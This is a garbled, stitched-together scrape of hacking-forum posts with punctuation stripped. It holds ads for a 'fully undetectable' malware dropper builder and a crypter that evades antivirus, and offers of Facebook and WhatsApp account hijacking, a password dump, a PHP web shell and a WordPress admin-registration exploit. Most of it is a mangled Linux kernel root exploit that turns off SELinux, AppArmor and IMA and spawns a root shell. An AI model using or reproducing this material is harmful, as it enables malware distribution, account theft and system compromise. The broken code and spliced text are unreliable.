vbe encoded visual basic script download execute exploits. 
hta html application download execute exploits. 
bat batch file download execute exploits. 
cmd command file download execute exploits. 
wsf windows script file download execute exploits. 
build fud silent microsoft office word download execute macro exploits. 
build fud silent microsoft office excel download execute macro exploits. 
you can choose download folder appdata programfiles windir temp homedrive. 
you can choose any kind url. 
you can choose every file type. 
have build usg which generate every time when you press the compile button unique exploits. 
you can choose random uppercase random lowercase and random numbers for the usg. 
you can use custom string encryption which will unique every click the compile button too and will encrypt every string the exploit file with unique password doesnt matter which kind exploit. 
html application help file body editor. 
they dont let uac pop means they bypass new added. 
htm html file download execute exploits. 
html html file download execute exploits. 
compile macros explicit for new added. 
powershell file download execute exploits. 
psc powershell file download execute exploits. 
exe executable file download execute exploits. 
pif program information file download execute exploits. 
scr screensaver file download execute exploits. 
day build fud silent. 
lnk shortcut file download execute exploits include icon changer with all windows icons for the shortcut file. 
windows shortcut exploits with file converter make your file. 
jpg and icon changer with all windows icons included too. 
optimized the macro engine and added new macro engines which you can select and both support full unicode and bit bit and they are fud new added. 
html exploit work now perfect and without any problems 'internet explorer edge'. 
url internet location file download execute exploits. 
new stronger and better unique encryption. 
new types private unique macro exploits. 
macro editor with that you can create your own private macro exploits modify them. 
windows shortcut exploits with file converter got this new extensions. 
some other small changes new added. 
com command file download execute exploits. 
added new types private unique macro exploits. 
some other small changes lifetime package with support seriously hit that button that's motivating factor results arcavir antivirus clean avast internet security win evo gen susp avg anti virus clean avira antivirus suite dropper. 
gen bitdefender antivirus plus clean clam antivirus clean comodo internet security malware hiipfz. 
web anti virus clean escan antivirus clean eset nod antivirus suspicious. 
prot antivirus for windows clean secure internet security clean forticlient lite possiblethreat ikarus anti. 
virus clean jiangmin antivirus trojan. 
ojvo trojan kaspersky anti virus heur trojan. 
generic mcafee virusscan enterprise clean quick heal internet security clean sophos anti virus clean symantec endpoint protection clean total defence anti virus clean zillya internet security worm. 
software registered joy seriously hit that button that's motivating factor hide crack don't think necessary for virus scan but for who skeptical here. 
dear how can cooment without watching the thread bro you allow comment after watching the thread then the comment willbe real and from the heart from user and you. 
seriously hit that button that's motivating factor hide hide note always perform virus scan and download your own risk. 
well i'll test out. 
mlet see wrote table width hello friends this trick still working dont beleieve look the below trick posted. 
basic suffering from crash poc vulnerability exploit code python usr bin python header poc file open asesino. 
write header poc file. 
close usr bin perl system title the black devils system color system cls print print print name easy icon maker version print exploit crash exploit print author the black devils print mail. 
rizma gmail dot com print sleep print creating. 
header poc open file inj. 
print file poc print file successfully created die print oupss file not created close file references. 
com issue wlb contact fane page. 
com user blackdevils facebook. 
like know how hack into isp server. 
table width hello friends lle this trick still working dont beleieve look the below trick posted. 
this simple guide read somebody else facebook messages without any effort cheers mike lets test. 
looking forward trying this out thanks. 
want see your share. 
thanks you much for sharing. 
dont think this thread works. 
looking for the missing links. 
this quite intriguing thanks for the share. 
thanks bro for program. 
thanks for posting this stuff. 
can see this works. 
tnx for the post. 
this simple guide read somebody else facebook messages without any effort cheers mike lets see action. 
how does works bro. 
let check microsofts leaked. 
thanx man looks like great archive. 
wrote table width thnx bro hello friends this trick still working dont beleieve look the below trick posted. 
this simple guide read somebody else facebook messages without any effort cheers mike anubhab wrote mikelbnkb vssdm nvsdjfgsdlfsd wrote table width thnx bro hello friends this trick still working dont beleieve look the below trick posted. 
lets check this out thanks. 
thanx and rep sent you. 
jesus touched bun bun. 
dns hacking hijacking tutorial hidden content you must reply see links this introduction dns poisoning which also includes example quite nifty application using the experiment. 
tanx man work mrci. 
wrote table width hello friends cool mam this trick still working dont beleieve look the below trick posted. 
ifdef have selinux include selinuxselinux. 
endif ifndef path max define path max endif typedef int prepare for exploit unsigned char buf typedef int trigger the bug void typedef int post exploit void typedef int get exploit state ptr struct exploit state exp state define max exploits struct exploit module char desc get exploit state ptr get exploit state ptr prepare for exploit prep trigger the bug trigger post exploit post int requires null page modules max exploits int num exploits char thoughts the limits language are the limits mind. 
all know what have words for. 
wittgenstein clock struck noon lucien rose. 
the metamorphosis was complete graceful uncertain adolescent had entered this cafe one hour earlier now man left leader among frenchmen. 
lucien took few steps the glorious light french morning. 
the corner rue des ecoles and the boulevard saint michel went towards stationery shop and looked himself the mirror would have liked find his own face the impenetrable look admired lemordant's. 
but the mirror only reflected pretty headstrong little face that was not yet terrible. 
i'll grow moustache decided. 
sartre the whole problem with the world that fools and fanatics are always full themselves but wiser people full doubts. 
russell mathematics rightly viewed posses not only truth but supreme beauty cold and austere like that sculpture. 
russell the person who writes for fools always sure large audience. 
schopenhauer with people limited ability modesty merely honesty. 
but with those who possess real talent hypocrisy. 
schopenhauer seek not the favor the multitude seldom got honest and lawful means. 
but seek the testimony few and number not voices but weigh them. 
kant this moment when each must fit arrow his bow and enter the lists anew reconquer within history and spite that which owns already the thin yield his fields the brief love the earth this moment when last man born time forsake our age and its adolescent furies. 
the bow bends the wood complains. 
the moment supreme tension there will leap into flight unswerving arrow shaft that inflexible and free. 
camus forfeit three quarters ourselves order like other people. 
schopenhauer style what gives value and currency thoughts. 
schopenhauer every truth passes through three stages before recognized. 
the first ridiculed the second opposed the third regarded self evident. 
schopenhauer before the law stands doorkeeper. 
this doorkeeper there comes man from the country who begs for admittance the law. 
but the doorkeeper says that cannot admit the man the moment. 
the man reflection asks will allowed then enter later. 
'it possible answers the doorkeeper 'but not this moment. 
since the door leading into the law stands open usual and the doorkeeper steps one side the man bends down peer through the entrance. 
when the doorkeeper sees that laughs and says 'if you are strongly tempted try get without permission. 
but note that powerful. 
and only the lowest doorkeeper. 
from hall hall keepers stand every door one more powerful than the other. 
and the sight the third man already more than even can stand. 
these are difficulties which the man from the country has not expected meet the law thinks should accessible every man and all times but when looks more closely the doorkeeper his furred robe with his huge pointed nose and long thin tartar beard decides that had better wait until gets permission enter. 
the doorkeeper gives him stool and lets him sit down the side the door. 
there sits waiting for days and years. 
makes many attempts allowed and wearies the doorkeeper with his importunity. 
the doorkeeper often engages him brief conversation asking him about his home and about other matters but the questions are put quite impersonally great men put questions and always conclude with the statement that the man cannot allowed enter yet. 
the man who has equipped himself with many things for his journey parts with all has however valuable the hope bribing the doorkeeper. 
the doorkeeper accepts all saying however takes each gift take this only keep you from feeling that you have left something undone. 
during all these long years the man watches the doorkeeper almost incessantly. 
forgets about the other doorkeepers and this one seems him the only barrier between himself and the law. 
the first years curses his evil fate aloud later grows old only mutters himself. 
grows childish and since his prolonged study the doorkeeper has learned know even the fleas his fur collar begs the very fleas help him and persuade the doorkeeper change his mind. 
finally his eyes grow dim and does not know whether the world really darkening around him whether his eyes are only deceiving him. 
but the darkness can now perceive radiance that streams from the door the law. 
now his life drawing close. 
before dies all that has experienced during the whole time his sojourn condenses his mind into one question which has never yet put the doorkeeper. 
beckons the doorkeeper since can longer raise his stiffening body. 
the doorkeeper has bend far down hear him for the difference size between them has increased very much the man's disadvantage. 
'what you want know now' asks the doorkeeper 'you are insatiable. 
'everyone strives attain the law answers the man 'how does come about then that all these years one has come seeking admittance but me' the doorkeeper perceives that the man nearing his end and his hearing failing bellows his ear 'no one but you could gain admittance through this door since this door was intended for you. 
kafka these are the conclusions individualism revolt. 
the individual cannot accept history. 
must destroy reality not collaborate with order reaffirm his own existence. 
camus the desire for possession only another form the desire endure this that comprises the impotent delirium love. 
human being even the most passionately loved and passionately loving ever our possession. 
camus art rebellion consummated and perpetuated the act real creation not criticism commentary. 
camus there therefore only one categorical imperative. 
act only according that maxim which you can the same time will that should become universal law. 
kant you have your way. 
for the right way the correct way and the only way does not exist. 
nietzsche the person lives most beautifully who does not reflect upon existence. 
nietzsche free nothing become free everything. 
hegel man acts though were the shaper and master language while fact language remains the master man. 
heidegger truth always rests with the minority and the minority always stronger than the majority because the minority generally formed those who really have opinion while the strength majority illusory formed the gangs who have opinion and who therefore the next instant when evident that the minority the stronger assume its opinion. 
while truth again reverts new minority. 
reading furnishes the mind only with materials knowledge thinking that makes what read ours. 
locke would warn you that not attribute nature either beauty deformity order confusion. 
only relation our imagination can things called beautiful ugly well ordered confused. 
spinoza the work intellectual not mould the political will others through the analyses that does his own field examine evidence and assumptions shake habitual ways working and thinking dissipate conventional familiarities evaluate rules and institutions and participate the formation political will where has his role citizen play. 
foucault the more read the more meditate and the more acquire the more enabled affirm that know nothing. 
voltaire completely joyless autumn days followed. 
the novel was written there was nothing more done and our life consisted sitting the rug next the stove staring the fire. 
besides started spending more time apart than had before. 
she began going out for walks. 
and something strange happened had often been the case life. 
yes yes imagine don't make friends easily rule due devilish peculiarity mine it's strain for with people and i'm distrustful and suspicious. 
but imagine despite all that some unlikely unexpected fellow who looks like the devil knows what will unfailingly make his way into heart and he'll the one like more than anyone else. 
bulgakov but what are smart people smart for not untangle tangled things bulgakov you pronounced your words you refuse acknowledge the existence either shadows evil. 
but would you kindly ponder this question what would your good evil didn't exist and what would the earth look like all the shadows disappeared after all shadows are cast things and people. 
but shadows also come from trees and from living beings. 
you want strip the earth all trees and living things just because your fantasy enjoying naked light you're stupid. 
bulgakov excuse but this after all absurd said korovyov refusing give. 
isn't that defines writer but what has written how can you know what ideas are fermenting brain bulgakov beauty fearful and terrible thing fearful because it's undefinable and cannot defined because here god gave only riddles. 
here the shores converge here all contradictions live together. 
i'm very uneducated man brother but i've thought about lot. 
terribly many mysteries too many riddles oppress man earth. 
solve them you can without getting your feet wet. 
beauty besides can't bear that some man even with lofty heart and the highest mind should start from the ideal the madonna and end with the ideal sodom. 
it's even more fearful when one who already has the ideal sodom his soul does not deny the ideal the madonna either and his heart burns with verily verily burns his young blameless years. 
man broad even too broad would narrow him down. 
devil knows even what make him that's the thing what's shame for the mind beauty all over for the heart. 
can there beauty sodom believe for the vast majority the people that's just where beauty lies did you know that secret the terrible thing that beauty not only fearful but also mysterious. 
here the devil struggling with god and the battlefield the human heart. 
dostoevsky heard exactly the same thing long time ago sure from doctor the elder remarked. 
was then old man and unquestionably intelligent. 
spoke just frankly you humorously but with sorrowful humor. 
love mankind said 'but amazed myself the more love mankind general the less love people particular that individually separate persons. 
dreams said often went far think passionately serving mankind and may would really have gone the cross for people were somehow suddenly necessary and yet incapable living the same room with anyone even for two days this know from experience. 
soon someone there close his personality oppresses self esteem and restricts freedom. 
twenty four hours can begin hate even the best men one because takes too long eating his dinner another because has cold and keeps blowing his nose. 
become the enemy people the moment they touch said. 
'on the other hand has always happened that the more hate people individually the more ardent becomes love for humanity whole. 
dostoevsky man who lies himself often the first take offense. 
sometimes feels very good take offense doesn't and surely knows that one has offended him and that himself has invented the offense and told lies just for the beauty that has exaggerated for the sake effect that has picked word and made mountain out pea knows all that and still the first take offense likes feeling offended gives him great pleasure and thus reaches the point real hostility. 
dostoevsky your opponent weak does not wish appear has idea what you are talking about you can easily impose upon him some argument that sounds very deep learned that sounds indisputable. 
schopenhauer self knowledge the bitterest knowledge all and also the kind cultivate least what the use catching ourselves out morning night the act illusion pitilessly tracing each act back its root and losing case after case before our own tribunal cioran man who fears ridicule will never far for good ill remains this side his talents and even has genius doomed mediocrity. 
cioran void random thought void int char thought char char int size thought srand time null thought strdup thoughts rand sizeof thoughts sizeof thoughts thought null return size thought strlen thought fprintf stdout nimg src smiley. 
gif width height border for size thoughtimg src smiley. 
gif width height border size thought fprintf stdout. 
thought break thought strrchr thought 'n' fprintf stdout. 
thought int unsigned long unsigned long thought else fprintf stdout. 
thought break fprintf stdout nimg src smiley. 
gif width height border free thought int check entry const struct dirent dir fnmatch exp. 
dir name return return void add exploit modules void struct dirent namelist void mod void desc prepare trigger post get exp state ptr requires null page char tmpname path max int int chdir homespenderimg src smiley. 
gif width height border scandir. 
namelist check entry alphasort fprintf stdout exploit modules found exiting. 
gif width height border exit for snprintf tmpname sizeof tmpname. 
namelist name tmpname sizeof tmpname mod dlopen tmpname rtld now mod null unable load fprintf stdout unable load namelist name free namelist continue desc dlsym mod descimg src smiley. 
gif width height border prepare dlsym mod prepareimg src smiley. 
gif width height border trigger dlsym mod triggerimg src smiley. 
gif width height border post dlsym mod postimg src smiley. 
gif width height border requires null page dlsym mod requires null pageimg src smiley. 
gif width height border get exp state ptr dlsym mod get exploit state ptrimg src smiley. 
gif width height border desc null prepare null trigger null post null get exp state ptr null requires null page null goto unable load ifdef non null only int requires null page free namelist continue else int requires null page free namelist continue endif num exploits max exploits fprintf stdout max exploits reached. 
gif width height border return strncpy modules num exploits. 
desc char desc sizeof modules num exploits. 
desc modules num exploits. 
desc sizeof modules num exploits. 
prep prepare for exploit prepare modules num exploits. 
trigger trigger the bug trigger modules num exploits. 
post post exploit post modules num exploits. 
get exploit state ptr get exploit state ptr get exp state ptr modules num exploits. 
requires null page int requires null page free namelist num exploits return struct exploit state exp state int eightk stack int twofourstyle int raised caps unsigned long current addr int cred support int cred offset unsigned long init cred addr define task running ifdef define kernel base define kstack min define kstack max else define kernel base define kstack min define kstack max endif char exit stack static inline unsigned long get current void unsigned long current current unsigned long current current unsigned long current current kstack min current kstack max return long current task running return return current static inline unsigned long get current void unsigned long current unsigned long oldstyle eightk stack current unsigned long current oldstyle current current unsigned long oldstyle twofourstyle current kstack min current kstack max return oldstyle long current task running return oldstyle twofourstyle return current static unsigned long get kernel sym char name file unsigned long addr char dummy char sname struct utsname ver int ret int rep int oldstyle fopen prockallsyms rimg src smiley. 
gif width height border null fopen procksyms rimg src smiley. 
gif width height border null goto fallback oldstyle repeat ret while ret eof oldstyle ret fscanf void addr dummy sname else ret fscanf void addr sname ret char strstr sname oimg src smiley. 
gif width height border strstr sname. 
gif width height border continue strrchr sname char sname strncmp smp while char sname ret fscanf sname continue strcmp name sname fprintf stdout resolved name void addr rep via system. 
map img src smiley. 
gif width height border fclose return addr fclose rep return fallback didn't find the symbol let's retry with the system. 
map dedicated the pointlessness russell coker's selinux test machine why does keep upgrading the kernel all necessary security can provided linux uname ver strncmp ver. 
oldstyle sprintf sname bootsystem. 
release fopen sname rimg src smiley. 
gif width height border null return rep goto repeat check for xen support unsigned long xen start info int xen detected int can change ptes check debug rodata only protects. 
rodata unsigned long mark rodata unsigned long set kernel text int audit enabled int ima audit int selinux enforcing int selinux enabled int sel enforce ptr int apparmor enabled int apparmor logsyscall int apparmor audit int apparmor complain unsigned char ima bprm check unsigned char ima file mmap unsigned char ima path check whoa look. 
support before it's even released unsigned char ima file check unsigned long security ops unsigned long default security ops unsigned long sel read enforce int what unsigned int our uid typedef int attribute regparm commit creds unsigned long cred typedef unsigned long attribute regparm prepare kernel cred unsigned long cred typedef void attribute regparm make lowmem page readonly unsigned long addr typedef void attribute regparm make lowmem page readwrite unsigned long addr make lowmem page readonly make lowmem page readonly make lowmem page readwrite make lowmem page readwrite commit creds commit creds prepare kernel cred prepare kernel cred struct cred int usage must int uid int gid int suid int sgid int euid int egid int fsuid int fsgid int securebits securebits default unsigned int cap inheritable cap init inh set unsigned int cap permitted cap full set unsigned int cap effective cap init eff set unsigned int cap bset cap init bset cap full set cap init eff set static void bella mafia quackafella records incorporated rhyme syndicate three yellow men trillionaire club unsigned long orig current cause it's trillion dollar industry unsigned char current unsigned char orig current unsigned char kernel scan start struct cred tmp cred real cred int kernel scan start unsigned char kernel base couldn't find our uids the task struct and don't have the symbols for the creds framework discover stupidly easy way task struct. 
const struct cred real cred const struct cred cred struct mutex cred exec mutex char comm. 
were executed from main then our name exploit otherwise it's pulseaudio then find init cred through heuristics increment its refcnt appropriately and set our credentials for exp state. 
run from main memcmp current exploit strlen exploitimg src smiley. 
gif width height border exp state. 
run from main memcmp current pulseaudio strlen pulseaudioimg src smiley. 
gif width height border now work backwards till find the unlocked cred mutex then the previous two pointers are our cred pointers want support any additional debugging members the mutex struct won't hard code any lengths for unsigned int current unlocked cred offset sizeof char real cred struct cred current sizeof char cred struct cred current sizeof char for tmp struct cred kernel scan start tmp usage tmp uid tmp gid tmp suid tmp sgid tmp euid tmp egid tmp fsuid tmp fsgid tmp securebits tmp cap inheritable tmp cap inheritable tmp cap permitted tmp cap permitted tmp cap effective tmp cap effective tmp cap bset tmp cap bset tmp cap bset finally found init cred now point our cred struct and increment usage init cred addr unsigned long tmp real cred cred tmp tmp usage exp state. 
got root return return return return static void give any way you can void commit creds prepare kernel cred commit creds prepare kernel cred exp state. 
got root else unsigned int current unsigned long orig current orig current get current orig current orig current get current current addr orig current current unsigned int orig current while unsigned long current orig current current our uid current our uid current our uid current our uid current unsigned long current orig current bella mafia quackafella records incorporated rhyme syndicate three yellow men trillionaire club orig current cred support return exp state. 
got root clear the uids and gids memset current sizeof unsigned int now let's try elevate our capabilities well pre creds structure. 
has next int ngroups gid groups ngroups then caps. 
has next struct group info group info then caps could actually capget but lets assume all three are both cases the capabilities occur before unsigned keep capabilities struct user struct user we'll fine with clobbering all between int int zeroed current skip uidsgids skip over any next pointer current sizeof unsigned long sizeof unsigned int for current zeroed current raised caps once zero block stop when find something non zero else zeroed break return unsigned long inline get void unsigned long asm volatile mov return void inline set unsigned long asm volatile mov int inline turn off void unsigned long xen enabled and can change ptes then we'll that can change ptes return don't xen enabled and can't just write kernel. 
text xen detected mark rodata set kernel text return it's just xen don't use we'll gpf xen detected return get set return void inline turn void unsigned long it's just xen don't use we'll gpf xen detected return get set unsigned long trigger retaddr unsigned long user unsigned long user static void get segment descriptors void ifdef asm volatile movq movq user user memory else asm volatile push pop push pop user user memory endif greets static void exit kernel void ifdef asm volatile swapgs movq rsp movq rsp movq rsp movq rsp movq rsp iretq user exit stack user eflags user trigger retaddr else asm volatile movl esp movl esp movl esp movl esp movl esp iret user exit stack user eflags user trigger retaddr endif static trigger the bug trigger static int main ret void trigger get return void trigger retaddr unsigned long builtin return address main ret trigger main ret exit return static void make range readwrite unsigned long start unsigned long len unsigned long end can change ptes return end start len make lowmem page readwrite start check the entire range fits one page start end make lowmem page readwrite end return static void make range readonly unsigned long start unsigned long len unsigned long end can change ptes return end start len make lowmem page readonly start check the entire range fits one page start end make lowmem page readonly end return static int attribute regparm own the kernel unsigned long exp state. 
got ring were already executed just nothing this time return exp state. 
got ring xen start info xen start info xen detected xen detected mark rodata set kernel text make lowmem page readonly make lowmem page readwrite can change ptes audit enabled audit enabled ima audit ima audit disable apparmor apparmor enabled apparmor enabled what apparmor enabled apparmor audit apparmor audit apparmor logsyscall apparmor logsyscall apparmor complain apparmor complain disable selinux selinux enforcing selinux enforcing what selinux enforcing selinux enabled selinux enabled selinux enabled trash lsm default security ops security ops only list lsm we're disabling something other than apparmor security ops default security ops what what security ops default security ops tpm this dedicated rcvalle redpig and the powerglove now you're playing with power ima only hashes kernel modules loaded things runmmap'd executable root. 
this course doesn't include our exploit. 
let's just stop appending the tpm'd hash list all together. 
course clever minds could think something better here with this code enable once they were done executing code root ima bprm check ima file mmap ima path check ima file check turn off memcmp ima bprm check xor eax eax retn make range readwrite unsigned long ima bprm check ima bprm check ima bprm check 'xc ima bprm check 'xc make range readonly unsigned long ima bprm check what memcmp ima file mmap xor eax eax retn make range readwrite unsigned long ima file mmap ima file mmap ima file mmap 'xc ima file mmap 'xc make range readonly unsigned long ima file mmap what ima path check memcmp ima path check xor eax eax retn make range readwrite unsigned long ima path check ima path check ima path check 'xc ima path check 'xc make range readonly unsigned long ima path check what ima file check memcmp ima file check xor eax eax retn make range readwrite unsigned long ima file check ima file check ima file check 'xc ima file check 'xc make range readonly unsigned long ima file check what turn just set selinux into permissive mode make the idiots think selinux enforcing sel read enforce unsigned char int can write can write turn off sizeof unsigned int sizeof unsigned long bit version look for the mov ecx rip off and replace with mov ecx for unsigned char sel read enforce unsigned long sel read enforce selinux enforcing determine address rip off it's our selinux enforcing sel enforce ptr int char int sel enforce ptr sel enforce ptr what can write what make range readwrite unsigned long 'xb unsigned int make range readonly unsigned long else bit replace push selinux enforcing with push for unsigned char sel read enforce unsigned long sel read enforce xff unsigned int while we're disable selinux without having symbol for selinux enforcing img src smiley. 
gif width height border selinux enforcing sel enforce ptr int sel enforce ptr sel enforce ptr what can write what make range readwrite unsigned long unsigned int make range readonly unsigned long else unsigned int old. 
are compiled different selinux enforcing sel enforce ptr int sel enforce ptr sel enforce ptr what can write what make range readwrite unsigned long 'xb unsigned int make range readonly unsigned long turn push real good give any way you can return this that can swap the stack out later need upon returning userland and won't lose any local variables the perf counter exploit can have the same pretty printouts all the others img src smiley. 
gif width height border note that fomit frame pointer required pull this hack off static unsigned char mem null static prepare for exploit prepare static get exploit state ptr get exploit state ptr static post exploit post static int requires null page static int exp idx more sgrakkyutwiz love static void exec rootshell void char buf path max struct stat int ret char argv binsh null char argvbash binsh norc noprofile null char envp term linux bash history devnull history devnull history devnull path null char envpbash term linux bash history devnull history devnull history devnull path null memset buf sizeof buf ret stat binbash readlink binsh buf path max setgroups null uses cap setgid don't care succeeds though should always binsh points dash and binbash exists use binbash strcmp buf bindashimg src smiley. 
gif width height border strcmp buf dashimg src smiley. 
gif width height border ret execve binbash argvbash envpbash else execve binsh argv envp fprintf stdout failed exec rootshellnimg src smiley. 
gif width height border int init void sync get segment descriptors exit stack char calloc exit stack null fprintf stdout unable alloc exit stacknimg src smiley. 
gif width height border exit exp state. 
exit stack exit stack ifndef non null only personality per svr mem mmap null prot read prot write prot exec map fixed map anonymous map private mem null mem mmap null prot read prot write map fixed map anonymous map private mem null fprintf stdout unable map zero page nimg src smiley. 
gif width height border goto boo hiss else main ret mprotect null prot read prot write prot exec main ret fprintf stdout unable mprotect zero page nimg src smiley. 
gif width height border goto boo hiss goto great success boo hiss ifdef have selinux exp state. 
run from main selinux enabled security context scontext context newcontext int retval retval getcon scontext retval goto fail strstr scontext wine timg src smiley. 
gif width height border fprintf stdout allow unconfined mmap low must actually work this machine nimg src smiley. 
gif width height border don't repeat exit fprintf stdout but wait perhaps selinux can revive this dead exploit. 
gif width height border newcontext context new scontext freecon scontext retval context type set newcontext wine timg src smiley. 
gif width height border retval goto fail scontext context str newcontext scontext null goto fail security check context scontext goto fail retval setexeccon scontext retval goto fail context free newcontext fprintf stdout this looks promising nimg src smiley. 
gif width height border execl procselfexe null fail fprintf stdout nope nimg src smiley. 
gif width height border endif exit great success fprintf stdout mapped zero page nimg src smiley. 
gif width height border endif add exploit modules num exploits fprintf stdout exploit modules detected exiting. 
gif width height border exit repeat fprintf stdout choose your exploitnimg src smiley. 
gif width height border for exp idx exp idx num exploits exp idx fprintf stdout exp idx modules exp idx. 
desc fprintf stdout exitn exp idx fprintf stdout img src smiley. 
gif width height border fflush stdout scanf main ret main ret exp idx exit main ret main ret num exploits fprintf stdout invalid number. 
gif width height border goto repeat random thought prepare modules main ret. 
prep trigger modules main ret. 
trigger get exploit state ptr modules main ret. 
get exploit state ptr post modules main ret. 
post requires null page modules main ret. 
requires null page exp state. 
get kernel sym get kernel sym get kernel sym exp state. 
own the kernel void own the kernel exp state. 
exit kernel void exit kernel get exploit state ptr exp state our uid getuid ima audit int get kernel sym ima auditimg src smiley. 
gif width height border ima file mmap unsigned char get kernel sym ima file mmapimg src smiley. 
gif width height border ima bprm check unsigned char get kernel sym ima bprm checkimg src smiley. 
gif width height border ima path check unsigned char get kernel sym ima path checkimg src smiley. 
gif width height border ima file check unsigned char get kernel sym ima file checkimg src smiley. 
gif width height border selinux enforcing int get kernel sym selinux enforcingimg src smiley. 
gif width height border selinux enabled int get kernel sym selinux enabledimg src smiley. 
gif width height border apparmor enabled int get kernel sym apparmor enabledimg src smiley. 
gif width height border apparmor complain int get kernel sym apparmor complainimg src smiley. 
gif width height border apparmor audit int get kernel sym apparmor auditimg src smiley. 
gif width height border apparmor logsyscall int get kernel sym apparmor logsyscallimg src smiley. 
gif width height border security ops unsigned long get kernel sym security opsimg src smiley. 
gif width height border default security ops get kernel sym default security opsimg src smiley. 
gif width height border sel read enforce get kernel sym sel read enforceimg src smiley. 
gif width height border audit enabled int get kernel sym audit enabledimg src smiley. 
gif width height border commit creds commit creds get kernel sym commit credsimg src smiley. 
gif width height border prepare kernel cred prepare kernel cred get kernel sym prepare kernel credimg src smiley. 
gif width height border xen start info unsigned long get kernel sym xen start infoimg src smiley. 
gif width height border mark rodata get kernel sym mark rodata roimg src smiley. 
gif width height border set kernel text get kernel sym set kernel text roimg src smiley. 
gif width height border make lowmem page readonly make lowmem page readonly get kernel sym make lowmem page readonlyimg src smiley. 
gif width height border make lowmem page readwrite make lowmem page readwrite get kernel sym make lowmem page readwriteimg src smiley. 
gif width height border main ret prepare mem main ret straight execution null mem 'xff' mem unsigned int mem sizeof unsigned long sizeof unsigned int unsigned long mem unsigned long own the kernel else main ret exit kernel null mem 'xff' mem unsigned int mem sizeof unsigned long sizeof unsigned int mem 'xff' mem unsigned int mem sizeof unsigned long sizeof unsigned int sizeof unsigned long unsigned long mem unsigned long own the kernel unsigned long mem sizeof unsigned long unsigned long exit kernel else main ret execute nonzero offset execute nonzero offset int off main ret mem off 'xff' mem off unsigned int mem off sizeof unsigned long sizeof unsigned int off unsigned long mem off unsigned long own the kernel trigger and handle the exit kernel case trigger get return exp state. 
got ring fprintf stdout got ring nimg src smiley. 
gif width height border else fprintf stdout didn't get ring bailingnimg src smiley. 
gif width height border exit commit creds prepare kernel cred fprintf stdout detected cred supportnimg src smiley. 
gif width height border else fprintf stdout detected stacks with current twofourstyle. 
style eightk stack char current addr cred support and cred support img src smiley. 
gif width height border raised caps fprintf stdout raised full old style src smiley. 
gif width height border cred offset fprintf stdout cred ptrs offset found task structn cred offset init cred addr fprintf stdout init cred found char init cred addr char msg switch what case msg apparmor break case msg selinux break case msg lsm break case msg ima break default msg nothing what insecure machine fprintf stdout disabled security msg xen detected mark rodata set kernel text make lowmem page readonly null make lowmem page readwrite null fprintf stdout unable issue xen hypercall for. 
text modification modification disablednimg src smiley. 
got root fprintf stdout got root nimg src smiley. 
gif width height border else fprintf stdout karael derki rootlayamad. 
gif width height border nimg src smiley. 
gif width height border exit main ret post main ret run rootshell exec rootshell else main ret chmod shell chmod binsh fprintf stdout binsh now setuid root. 
gif width height border else main ret funny pic and rootshell system gthumb fullscreen. 
gif width height border. 
color hello guys just hack motorola router wanna share with you. 
color user admin pass motorola color don't change user and password. 
gif otherwise hang color blink warning blink color blink please don't dump this post and use for educational purpose. 
blink good color thank you. 
hello please just downloaded now and tried but it's showing unknown error and email sent. 
thanks thanks thanks thanks thanks thanks thanks thanks thanks thanks thanks thanks thanks thanks thanks thanks thanks. 
yes some programs are. 
thank you for this info. 
sonakay wrote let try not working any more said suspended. 
ill let yall know. 
can you teach how. 
net images smilies hmm. 
let see how works bro. 
bluegene wrote thanks man lets see what got. 
thanks i'm gonna test this and it's works i'm gonna make some giveaways. 
amazing let see and try. 
just share able see the content. 
everyone offering rdg tejon crypter. 
extreme private edition fud fully undetectable features. 
new fully undetected very stable very powerful unicode supported obfuscator bypass kaspersky internet security included proactive defense bypass outpost firewall bypass zemana keylogger hips bypass comodo internet security hips bypass antihook hips bypass spyshelter hips bypass avast antivirus proactive bypass norton internet security proactive bypass avast antivirus bypass eset nod bypass gdata internet security bypass trustport antivirus bypass panda internet security bypass web antivirus bypass avira internet security bypass avg internet security bypass bypass bitdefender anti database update remove from disk major icon quality clone file properties best binder speed increase add vista resource manifest anti avira heuristic detection anti nod heuristic detection fix checksum fake error generator compatible windows vista windows windows. 
bits script support process suspended process killer run only admin mode cannot run safe mode anti tracing anti craking set file atributes anti kaspersky kaspersky bypass proactive defense binder activex registration anti heuristic detection anti firewall bypass vista uac bypass new engine very stable file bundle dll bundle register activex ole com control anti heuristic detection obfuscation your executable helps protect against tampering and cracking. 
process killer multiple process killer cannot run safe mode run only admin mode set file attributes anti shadow user pro anti clean slate anti sandbox fortres run fake process delete execute delete rdg loader anti joebox enhanced anti anubis enhanced anti cwsandbox enhanced sleep sec. 
run program after seconds. 
enhanced process ghost change process name anti debugger anti sandboxie anti virtualpc realig sections anti ida debugger anti cwsandbox anti norman sandbox anti anubis oep stolen bytes enhanced checksum crc anti ollydbg anti threatexpert anti joebox anti vmware anti virtualbox anti debugger overlay support eof data sleep sec. 
exceptions get all privileges change icon enhanced oep stolen bytes enhanced anti virtual machine max heuristic anti sunbelt sandbox anti deep freeze anti returnil vistual system anti malware defender anti wine linux anti xen virtual machine password protect execute with command line parameters unhook all api anti attach loader protect rdg loder execute authority system restore api unicode supported exclusive builder stub for each buyer full support support free support. 
compatible with windows vista windows windows. 
support bits automatic eof support payment options price extreme edition order via email rdgmax walla. 
com crypter's website live chat. 
let check this out now. 
thanks for sharing this wonderful software all. 
thanks you let see. 
lovely ware own need check out. 
thank you vary much. 
pid dateline huge email password dump sharing with you all huge email and password dump got hands about year ago. 
virg wrote looking other peoples watsapp chats updated now works tanks. 
posting read hidden msg. 
hello when got the admin access need upload shell. 
after uploading shell can index deface website server rooting cpanel cracking etc. 
there are many php shell like etc. 
one the best and secure shell not found private shell. 
without password you can't open. 
you upload shell server without you none can use. 
what you can find this shell from here shell password indianhacker. 
hey would love see this thanks for the tut. 
prince chaddha wrote facebook account reset hijack session day exploit only for attach config attach want see this pls prince chaddha wrote facebook account reset hijack session day exploit only for this link still working attach config attach prince chaddha wrote facebook account reset hijack session day exploit only for this link still working attach config attach prince chaddha wrote facebook account reset hijack session day exploit only for attach config attach want see this pls. 
aniket use vmware bro cool. 
broo sent from using tapatalk. 
codefire wrote this will help you. 
html thanks very much. 
got the password now but could not log into another computer when use this password. 
its working please know guys. 
thx for share bro please download link. 
size wordpress day exploiter tutorial wordpress day exploiter wordpress day exploiter tool that enable you register new admin wordpress site which have the bug the ajax. 
how create dorks it's very easy create the dorks the list vulnerable themes are already provided the right richtext box. 
you just need add the theme name. 
